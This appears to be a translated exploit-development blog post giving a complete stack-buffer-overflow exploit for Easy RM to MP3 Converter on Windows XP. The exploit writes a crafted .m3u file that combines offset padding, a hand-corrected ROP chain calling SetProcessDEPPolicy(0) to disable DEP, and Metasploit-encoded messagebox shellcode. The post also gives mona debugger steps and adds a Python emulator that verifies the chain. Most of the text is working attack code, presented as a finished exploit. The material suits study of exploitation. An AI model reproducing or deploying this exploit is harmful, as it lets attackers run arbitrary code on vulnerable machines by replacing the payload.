Tags: overflow
tools: Immunity Debugger with the mona.py plugin
used API: SetProcessDEPPolicy (MSDN)
BOOL WINAPI SetProcessDEPPolicy(
    _In_ DWORD dwFlags   // 0x00000000 turns DEP off for the calling process
);
return value: nonzero on success, 0 on failure.
Caveats worth knowing before relying on it: the function exists only from XP SP3 / Server 2008 / Vista SP1 on and only for 32-bit processes; the DEP setting of a process can be changed just once, so the call fails if DEP was already set for the process; and it also fails when the system policy is AlwaysOn or the process is permanently DEP-enabled (for example an image linked with /NXCOMPAT on Vista SP1 and later). On the XP SP3 target used here, with the default OptIn/OptOut policy, dwFlags = 0 succeeds.
import struct
import sys

# Padding up to the saved return address (offset found with mona's
# pattern_create / pattern_offset, see the notes below).
junk = b"A" * 25000
junkb = b"A" * 1067

################################################################################
## Register setup for SetProcessDEPPolicy() (mona.py layout, corrected):
##--------------------------------------------
## EAX = <not used>
## ECX = <not used>
## EDX = <not used>
## EBX = dwFlags = 0x00000000 (passed by value; mona generated a pointer to
##       0x00000000 here, which is wrong; built as 0xffffffff + INC EBX so the
##       file contains no null byte)
## ESP = ReturnTo (automatic: PUSHAD pushes ESP, which points at the shellcode)
## EBP = ptr to SetProcessDEPPolicy()
## ESI = <not used>
## EDI = ROP NOP (4 byte stackpivot: a POP EDI # RETN that skips the pushed ESI)
##--------------------------------------------
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be, then fixed by hand
    rop_gadgets = [
        0x77c01498,  # POP EBP # RETN [msvcrt.dll]
        0x90909090,  # filler: the vulnerable function returns with RETN 4,
                     # so these 4 bytes are discarded before POP EBP runs
        0x7c862144,  # SetProcessDEPPolicy() [kernel32.dll] -> EBP
        ## mona's original pair (loads a pointer, wrong for a by-value DWORD):
        ## 0x7c80dfdd, # POP EBX # RETN [kernel32.dll]
        ## 0x75ff0104, # &0x00000000 [MSVCP60.dll]
        0x7c80dfdd,  # POP EBX # RETN [kernel32.dll]
        0xffffffff,  # EBX = -1 (a literal 0 would put null bytes in the file)
        0x770f9028,  # INC EBX # RETN [oleaut32.dll] -> EBX = 0 = dwFlags
        0x766cbaec,  # POP EDI # RETN [WININET.dll]
        0x766cbaec,  # EDI = POP EDI # RETN: after PUSHAD # RETN this skips the
                     # pushed ESI and returns into EBP (SetProcessDEPPolicy)
        0x77dcc5ee,  # PUSHAD # RETN [ADVAPI32.dll]
    ]
    return b"".join(struct.pack("<I", g) for g in rop_gadgets)

rop_chain = create_rop_chain()

# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
## generate -b '\x0a\x00\x0d' -t python
buf = b""
buf += b"\xbb\x44\xfb\x26\x2f\xda\xdb\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x44\x31\x5d\x14\x83\xed\xfc\x03\x5d\x10\xa6"
buf += b"\x0e\xff\xc4\xbd\x28\x74\x3f\x35\xfb\xa7\x8d\xc2\xcd"
buf += b"\x8e\x96\xa7\x5f\x21\xdc\xc1\x93\xca\x94\x31\x27\x8a"
buf += b"\x50\xc2\x49\x33\xea\xe2\x8d\x7c\xf4\x7f\x1d\xdb\x05"
buf += b"\xae\x1e\x3d\x65\xdb\x8d\x9a\x42\x50\x08\xdf\x01\x32"
buf += b"\xbb\x67\x17\x50\x30\xdd\x0f\x2f\x1d\xc2\x2e\xc4\x41"
buf += b"\x36\x78\x91\xb2\xbc\x7b\x4b\x8b\x3d\x4a\x53\x10\x6d"
buf += b"\x29\x93\x9d\x69\xf3\xdc\x53\x77\x34\x09\x9f\x4c\xc6"
buf += b"\xe9\x48\xc6\xd7\x7a\xd2\x0c\x19\x97\x85\xc7\x15\x2c"
buf += b"\xc1\x82\x39\xb3\x3e\xb9\x46\x38\xc1\x56\xcf\x7a\xe6"
buf += b"\xba\xb1\x41\x54\xca\x18\x91\x10\x2e\xd3\xdb\x4b\x3f"
buf += b"\xaa\xd5\x67\x6d\xdb\x76\x88\x6d\xe4\x01\x32\x96\xa0"
buf += b"\x6f\x65\x74\xa5\x08\x89\x5d\x18\xfe\x3c\x62\x63\x01"
buf += b"\xc9\xd8\x94\x95\xa6\x8e\x84\x24\x5f\x7c\xf7\x88\xfb"
buf += b"\xea\x82\xa7\x66\x99\xe4\x1b\x4d\x57\x7c\x45\xdb\x98"
buf += b"\x2b\x8d\x6d\xa4\x84\x36\xc5\x8b\x68\xf4\x91\xd0\x56"
buf += b"\x56\x76\x89\x69\xa9\x79\x22\xf9\x2d\xde\x93\x6d\xac"
buf += b"\xb9\xb6\x2f\x46\x0b\x5c\xc3\xe5\xa2\x45\xab\x55\xe1"
buf += b"\x73\x25\x86\x81\xdb\x15\x68\x72\xb4\x18\x3b\x34\x65"
buf += b"\xcb\xc9\xd7\x08\x2b\x45\x47\xff\x0b\xf3\xff\xb7\x2e"
buf += b"\x97\x93\x76\x78\xef\x20\x5d\x6a\x66\x59\xac\x58\x2a"
buf += b"\xc9\x9e\x0e\x35\x3d\x11\x6f\x99\x41\x07\x67"

# Layout: padding | ROP chain | shellcode. SetProcessDEPPolicy(0) returns into
# the ESP value that PUSHAD pushed, which is the first byte of buf.
shellcode = junk + junkb + rop_chain + buf
# Write raw bytes with no trailing newline:  python exp.py > crash.m3u
sys.stdout.buffer.write(shellcode)
Notes:
step1: In Immunity Debugger
!mona pattern_create 5000
!mona pattern_offset XXXX
Get the offset so that the return address is overwritten exactly.
You also have to check whether the overwritten function returns with RETN or RETN 4. Here it turned out to be RETN 4, which has to be accounted for when building the ROP chain: RETN 4 pops the return address (the first gadget) and then adds 4 to ESP, so the 4 bytes that follow the first gadget address are never executed. That is what the 0x90909090 filler in the chain is for.
step2: In Immunity Debugger
!mona rop -m *.dll -cp nonull
Use mona to generate the ROP chain automatically, with addresses that contain no null bytes.
With 1 GB of RAM in a virtual machine this took me a full 40 minutes, and the result still turned out to be wrong in its details.
Suggestion: next time, run the key test against one DLL and fill in the rest by hand; that is faster.
Error: the ROP chain generated in this test was wrong because DLL relocation (rebasing) was not taken into account; adding the parameter -cm rebase when running the test fixes this.
step3: find the address of a given instruction sequence (e.g.)
!mona asm -s "inc ebx#ret"
This returns the opcode bytes of the instructions.
!mona find -s "<opcode bytes>" -m aim.dll
step4: fix up the ROP chain
The chain mona generated loaded EBX with a pointer to a zero dword (POP EBX # RETN followed by &0x00000000 from MSVCP60.dll). That is wrong for SetProcessDEPPolicy: dwFlags is a DWORD passed by value, so EBX itself has to be 0, not the address of a 0. A literal 0x00000000 cannot go into the file because of the null bytes, so instead load 0xffffffff with POP EBX # RETN and follow it with INC EBX # RETN (located with the step 3 search), which leaves EBX = 0. The remaining gadgets stay as generated: POP EBP # RETN loads the address of SetProcessDEPPolicy, POP EDI # RETN loads a second POP EDI # RETN as the 4-byte stack pivot, and PUSHAD # RETN pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. Control then flows EDI (POP EDI # RETN, which eats the pushed ESI) -> EBP = SetProcessDEPPolicy, which sees the pushed ESP as its return address (pointing at the shellcode) and the pushed EBX = 0 as dwFlags. The final chain is the create_rop_chain() in the exploit above.
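To make the step 4 reasoning checkable, here is an added example (not code from the original post): a small stack-only emulator for the gadget types the chain uses. It builds the three variants of the EBX setup (mona's pointer, a literal 0, and the 0xffffffff + INC EBX trick), runs each one through the RETN 4 return and the PUSHAD # RETN trampoline, and reports what SetProcessDEPPolicy would see at entry. The gadget addresses are the ones from the exploit; their effects are modelled, not disassembled, and the stack address 0x0012F000 and the \xcc shellcode are constructed for the simulation.

```python
# Added example (not from the original post): a minimal stack emulator for the
# gadget types used by the SetProcessDEPPolicy chain, to show why the final
# chain works and why the two earlier attempts do not.  Gadget addresses are
# the ones from the exploit; their effects are modelled, not disassembled, and
# the stack address and the shellcode are constructed for the simulation.
import struct

# Gadget addresses from the exploit (XP SP3 module layout as used on the page).
POP_EBP = 0x77C01498                 # POP EBP # RETN   [msvcrt.dll]
POP_EBX = 0x7C80DFDD                 # POP EBX # RETN   [kernel32.dll]
INC_EBX = 0x770F9028                 # INC EBX # RETN   [oleaut32.dll]
POP_EDI = 0x766CBAEC                 # POP EDI # RETN   [WININET.dll]
PUSHAD = 0x77DCC5EE                  # PUSHAD # RETN    [ADVAPI32.dll]
SET_PROCESS_DEP_POLICY = 0x7C862144  # kernel32!SetProcessDEPPolicy
PTR_TO_ZERO = 0x75FF0104             # &0x00000000 that mona picked [MSVCP60.dll]

# What each modelled gadget does before its RETN.
GADGET_EFFECT = {
    POP_EBP: ("pop", "ebp"),
    POP_EBX: ("pop", "ebx"),
    INC_EBX: ("inc", "ebx"),
    POP_EDI: ("pop", "edi"),
    PUSHAD: ("pushad", None),
}

BAD_CHARS = b"\x00\x0a\x0d"          # the -b list the exploit passed to generate


def build_chain(variant="final"):
    """ROP chain bytes for one of three ways of loading dwFlags into EBX:
    'mona'    - as generated: EBX = pointer to a zero dword (wrong: dwFlags is by value)
    'literal' - EBX = 0x00000000 (right value, but puts null bytes in the file)
    'final'   - EBX = 0xffffffff then INC EBX (right value, no bad characters)"""
    ebx_setup = {
        "mona": [POP_EBX, PTR_TO_ZERO],
        "literal": [POP_EBX, 0x00000000],
        "final": [POP_EBX, 0xFFFFFFFF, INC_EBX],
    }[variant]
    gadgets = ([POP_EBP, 0x90909090, SET_PROCESS_DEP_POLICY]  # 0x90909090 is eaten by RETN 4
               + ebx_setup
               + [POP_EDI, POP_EDI, PUSHAD])                   # EDI = POP EDI # RETN (skips ESI)
    return b"".join(struct.pack("<I", g) for g in gadgets)


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of forbidden byte values that occur in data."""
    return sorted(set(data) & set(bad))


def emulate(chain, shellcode, stack_base=0x0012F000, retn_imm=4):
    """Run the chain on a simulated stack until control reaches SetProcessDEPPolicy.
    stack_base is the (assumed) address of the overwritten return-address slot;
    retn_imm models the vulnerable function returning with RETN 4.
    Returns what the API sees at entry: [esp] (return address) and [esp+4] (dwFlags)."""
    slack = 64                                   # room below the chain for PUSHAD's 32 bytes
    mem = bytearray(slack) + bytearray(chain) + bytearray(shellcode)
    lo = stack_base - slack                      # address of mem[0]

    def rd(addr):
        return struct.unpack_from("<I", mem, addr - lo)[0]

    def wr(addr, val):
        struct.pack_into("<I", mem, addr - lo, val & 0xFFFFFFFF)

    regs = {r: 0 for r in ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")}
    esp = stack_base
    eip, esp = rd(esp), esp + 4 + retn_imm       # RETN imm: pop EIP, then discard imm bytes
    for _ in range(32):                          # hard stop against runaway chains
        if eip == SET_PROCESS_DEP_POLICY:
            return {"return_to": rd(esp), "dwFlags": rd(esp + 4),
                    "shellcode_addr": stack_base + len(chain), "ebx": regs["ebx"]}
        if eip not in GADGET_EFFECT:
            raise RuntimeError("control left the modelled chain at %#010x" % eip)
        op, reg = GADGET_EFFECT[eip]
        if op == "pop":
            regs[reg], esp = rd(esp), esp + 4
        elif op == "inc":
            regs[reg] = (regs[reg] + 1) & 0xFFFFFFFF
        elif op == "pushad":                     # pushes EAX..EDI; the pushed ESP is the
            saved_esp = esp                      # value before the push, i.e. the shellcode
            for r in ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"):
                esp -= 4
                wr(esp, saved_esp if r == "esp" else regs[r])
        eip, esp = rd(esp), esp + 4              # the gadget's own RETN
    raise RuntimeError("chain did not reach SetProcessDEPPolicy")


if __name__ == "__main__":
    shellcode = b"\xcc" * 16                     # constructed stand-in for the real payload
    for variant in ("mona", "literal", "final"):
        chain = build_chain(variant)
        state = emulate(chain, shellcode)
        print("%-7s dwFlags=%#010x return_to=%#010x (shellcode at %#010x) bad=%s" % (
            variant, state["dwFlags"], state["return_to"],
            state["shellcode_addr"], bad_chars_in(chain)))
```

Only the 'final' variant both passes dwFlags = 0 and survives the bad-character check; 'mona' passes the pointer 0x75ff0104 as dwFlags, and 'literal' passes 0 but contains null bytes. Calling emulate(build_chain("final"), shellcode, retn_imm=0) shows the other point from step 1: without RETN 4 the 0x90909090 filler lands in EBP and the chain falls apart.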
C:\Documents and Settings\Administrator\桌面>exp.py >crash.m3u
Drag the file onto the program.
PWN!!!!!!!
EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech
Original article: http://blog.csdn.net/bugmeout/article/details/45272889